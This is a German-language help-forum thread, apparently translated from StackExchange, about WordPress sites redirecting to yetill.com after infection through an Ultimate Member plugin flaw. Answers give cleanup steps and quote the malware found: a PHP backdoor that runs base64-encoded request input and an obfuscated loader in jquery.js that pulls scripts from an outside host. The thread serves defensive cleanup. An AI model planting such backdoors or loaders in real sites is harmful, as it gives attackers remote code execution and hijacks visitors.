it-swarm.com.de

Wordpress Site leitet immer auf yetill.com um

 enter image description here

Wer kann mir helfen, meine Site zu reparieren? Es leitet immer zu yetill.com um. Ich habe nach dieser Site gesucht und erfuhr, dass es sich um eine Art Malware handelt .. Ich habe verschiedene Lösungen aus dem Netz gefunden, aber immer noch nicht gelöst.

Vielen Dank.

3
iamsushi_j12n

Es scheint, dass dies durch die Anfälligkeit einiger Plugins verursacht wird, die Sie möglicherweise verwenden. 

In meinem Fall war es die ältere Version (vor 2.22) des Ultimate Member Plugins. 

Wenn Sie Version 2.22 oder früher dieses Plugins verwenden, sollten Sie dieses Plugin sofort aktualisieren und temporäre Dateien löschen. ( https://wordpress.org/support/topic/malicious-files-in-ultimate-members-plugin/ )

Suchen Sie danach mit diesem Befehl nach kürzlich aktualisierten Dateien. (z. B. 15 Tage)

find ./ -type f -mtime -15

Die Wahrscheinlichkeit ist Ihre WP -Jquery-Datei, und alle Dateien mit dem Namen "header" sind wahrscheinlich infiziert. 

/wp-includes/js/jquery/jquery.js
/wp-contents/your-theme/header.php
..

Entfernen Sie das folgende Skript aus Ihren infizierten Header-Dateien. 

<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>

Es sieht so aus, als würde dies direkt nach dem Öffnen des Head Tags und direkt vor dem Schließen des Head Tags eingefügt. Stellen Sie sicher, dass Sie beide löschen.

Entfernen Sie in böser Absicht eingefügte Skripts aus der infizierten Jquery-Datei oder ersetzen Sie die Datei einfach durch eine saubere Datei aus anderen WP Core-Installationen. 

Ich denke, das sollte das Problem beheben. 

1
pinktig

Vorläufige Schritte:

  1. Sichern Sie alles
  2. Überprüfen Sie die Datei wp-includes/js/jquery/jquery.js - die erste Zeile sollte nur einen Kommentar enthalten, wie /*! jQuery v1.... Alles vor dieser Zeile löschen (Sie haben eine Sicherungskopie erstellt, oder?)
  3. Überprüfen Sie das Verzeichnis/wp-content/uploads auf verdächtige Dateien. Für uns hatten wir bösartige Dateien, z. In diesem Unterverzeichnis:/ultimatemember/temp/[zufälliges Verzeichnis] ​​/n.php - Löschen Sie diese nach dem Erstellen einer Sicherung.
  4. Installieren Sie das WordFence WP -Plugin und scannen Sie Ihre Site
  5. Vergewissern Sie sich, dass wp-includes/js/jquery/jquery.js noch in Ordnung ist (es kann erneut geändert werden).
  6. Berücksichtigen Sie die WordFence-Option "Deaktivieren Sie die Codeausführung für das Uploads-Verzeichnis", um zukünftige Eingriffe zu verhindern, wenn dies für Ihre Site funktioniert (test!).

Hintergrund:

Wir haben das gleiche Problem. Wordfence hat festgestellt, dass die Datei wp-includes/js/jquery/jquery.js auf dem Server geändert wurde. Das Wiederherstellen der ursprünglichen Version schien es zu lösen. ABER die Datei wurde schnell infiziert (Stunden?). Also wissen wir die Quelle noch nicht ...

Wir haben in/wp-content/uploads/ultimatemember/temp/[random dir] /n.php verdächtigen Code gefunden:

<?php file_put_contents('sdgsdfgsdg','<?php '.base64_decode($_REQUEST['q']));
include('sdgsdfgsdg'); unlink('sdgsdfgsdg'); ?>

Das führt im Wesentlichen jeden PHP Code von außen aus ...

Nach dem Löschen dieser Dateien schien die Site wieder normal zu sein (einige Stunden).

Wir haben auch ein verdächtiges <a>-Tag in der Seitenquelle festgestellt. aber nicht sicher über seine Relevanz.

<a class="html-attribute-value html-resource-link" target="_blank"
href="https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4"
rel="noreferrer noopener">https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4</a>
2
Vivien

Wir haben den gleichen Fehler, diese Dateien wurden infiziert. Dies ist der schädliche Code, den ich darin gefunden habe.

wP-Includes/Js/Jquery/Jquery.js

(function() { "use strict"; var _0xa8bd=["\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x72\x63\x2E\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2E\x63\x6F\x6D\x2F\x67\x65\x74\x2E\x70\x68\x70","\x6E\x75\x6C\x6C","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64"];function httpGet(_0xc4ecx2){var _0xc4ecx3= new XMLHttpRequest();_0xc4ecx3[_0xa8bd[1]](_0xa8bd[0],_0xc4ecx2,false);_0xc4ecx3[_0xa8bd[2]](null);return _0xc4ecx3[_0xa8bd[3]]}var curdomain=_0xa8bd[4];var newlink=httpGet(curdomain);if(newlink!= _0xa8bd[5]){(function(){var _0xc4ecx6=document[_0xa8bd[7]](_0xa8bd[6]);_0xc4ecx6[_0xa8bd[8]]= _0xa8bd[9];_0xc4ecx6[_0xa8bd[10]]= true;_0xc4ecx6[_0xa8bd[11]]= newlink;document[_0xa8bd[13]][_0xa8bd[12]](_0xc4ecx6)})()} })();

themes/yourtheme/header.php

<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>
1
shadowclover

jquery-Datei wurde in meinem Fall infiziert. Löschen Sie einfach den Code vor/*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */und stellen Sie sicher, dass alle Plugins aktualisiert sind und die Website sicher ist. Überprüfen Sie auch die Berechtigungen der Dateien! Das hilft mir in meinem Fall

1
Rosen

Sie müssen einige Fehler beheben. Es ist entweder Ihr Design oder eines Ihrer Plugins, das den schädlichen Code enthält.

Folge diesen Schritten:

  • Wechseln Sie zu einem Standarddesign wie TwentySeventeen - Wenn das Problem Weiterhin besteht, ist es nicht Ihr Thema.
  • Deaktivieren Sie alle aktiven Plugins und überprüfen Sie die Website. Das Problem sollte behoben sein.
  • Beginnen Sie mit der Reaktivierung Ihrer Plugins, leeren Sie den Cache nach jeder Reaktivierung Und überprüfen Sie Ihre Website. - Wenn das Problem erneut auftritt, ist es

Hoffe das hilft.

1
Hamza Ahmad

Das habe ich heute nach dem Ausführen des securi-Scanners festgestellt. Hoffentlich hilft das jemandem, weil dieser eine unangenehme ist. Es scheint, dass in meinem Fall die folgenden Dateien betrifft:

  • wp-admin/install.php 
  • wP-Includes/Js/Jquery/Jquery.js 
  • wp-include/theme-compat/header-embed.php 
  • wp-includes/theme-compat/header.php 

Was auch immer es war, schien sich in meinem WP-Includes-Verzeichnis zu verlaufen zu haben. Ich führe Ultimate Member Plugin aus und bemerkte, dass jemand zuvor erwähnt hatte, dass frühere Versionen dieses Plugins Schwachstellen hatten. Ich habe ein Netzwerk mit mehreren Standorten und habe auch festgestellt, dass zwei der Anmeldeformulare auf meinen Unterseiten die Standardrolle Administrator (welcher Plugin-Anbieter würde diese Option als Standardregistrierungsoption für sicher halten?) Auswählen. keine Bestätigungs-E-Mails). Die Aktivierung dieses Plugins in einer Netzwerkumgebung erfordert anscheinend eine gründliche Überprüfung der Registrierung und der Anmeldeformulare. 

Possible Infected Files

0
Steem Backed

Hatte das gleiche Problem. Jquery war infiziert und musste durch die Originalversion ersetzt werden. Der Hacker nutzte wahrscheinlich die Hintertür von Ultimatemember, um eine PHP-Datei hochzuladen und sie auszuführen. Ich musste das Plugin-Temp-Verzeichnis aufräumen.

Eine weitere Beobachtung war, dass der Hack das modifizierte Jquery-Skript zwang, die Adresse von http://src.eeduelements.com/get.php zu laden. Dies gibt ihnen die Flexibilität, die Anzeigen zu drehen.

0
Sudo grep --include=\*.php -rnw . -e "<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>"

das zusammen mit dieser Antwort hat mir geholfen, meine Dateien zu säubern. Alle meine Websites waren davon betroffen, aber jetzt scheint sie immer noch auf der Website zu bestehen, auf der sich das ultimative Mitglied befand. Ich arbeite immer noch daran. Dieses PHP-Skript war jedoch unglaublich. Vielen Dank an den Schriftsteller.

PHP/SSH-Regex-Skript/Befehl zum Löschen identischen Malware-Codes aus vielen Dateien

Dies ist der php aus der obigen Antwort. Ich habe gerade den Fundabschnitt mit den bösartigen Sachen ausgetauscht, die noch auf die Weiterleitung umgeleitet wurden. 

    <?php
//Enter it as it is and escape any single quotes
$find='<script type=\'text/javascript\' src=\'https://cdn.eeduelements.com/jquery.js?ver=1.0.8\'></script>';

echo findString('./',$find);

function findString($path,$find){
    $return='';
    ob_start();
    if ($handle = opendir($path)) {
        while (false !== ($file = readdir($handle))) {
            if ($file != "." && $file != "..") {
                if(is_dir($path.'/'.$file)){
                    $sub=findString($path.'/'.$file,$find);
                    if(isset($sub)){
                        echo $sub.PHP_EOL;
                    }
                }else{
                    $ext=substr(strtolower($file),-3);
                    if($ext=='php'){
                        $filesource=file_get_contents($path.'/'.$file);
                        $pos = strpos($filesource, $find);
                        if ($pos === false) {
                            continue;
                        } else {
                        //The cleaning bit
                        echo "The string '".htmlentities($find)."' was found in the file '$path/$file and exists at position $pos and has been removed from the source file.<br />";
                        $clean_source = str_replace($find,'',$filesource);
                        file_put_contents($path.'/'.$file,$clean_source);
                        }
                    }else{
                        continue;
                    }
                }
            }
        }
        closedir($handle);
    }
    $return = ob_get_contents();
    ob_end_clean();
    return $return;
}
?>
0
Maxwell Paradis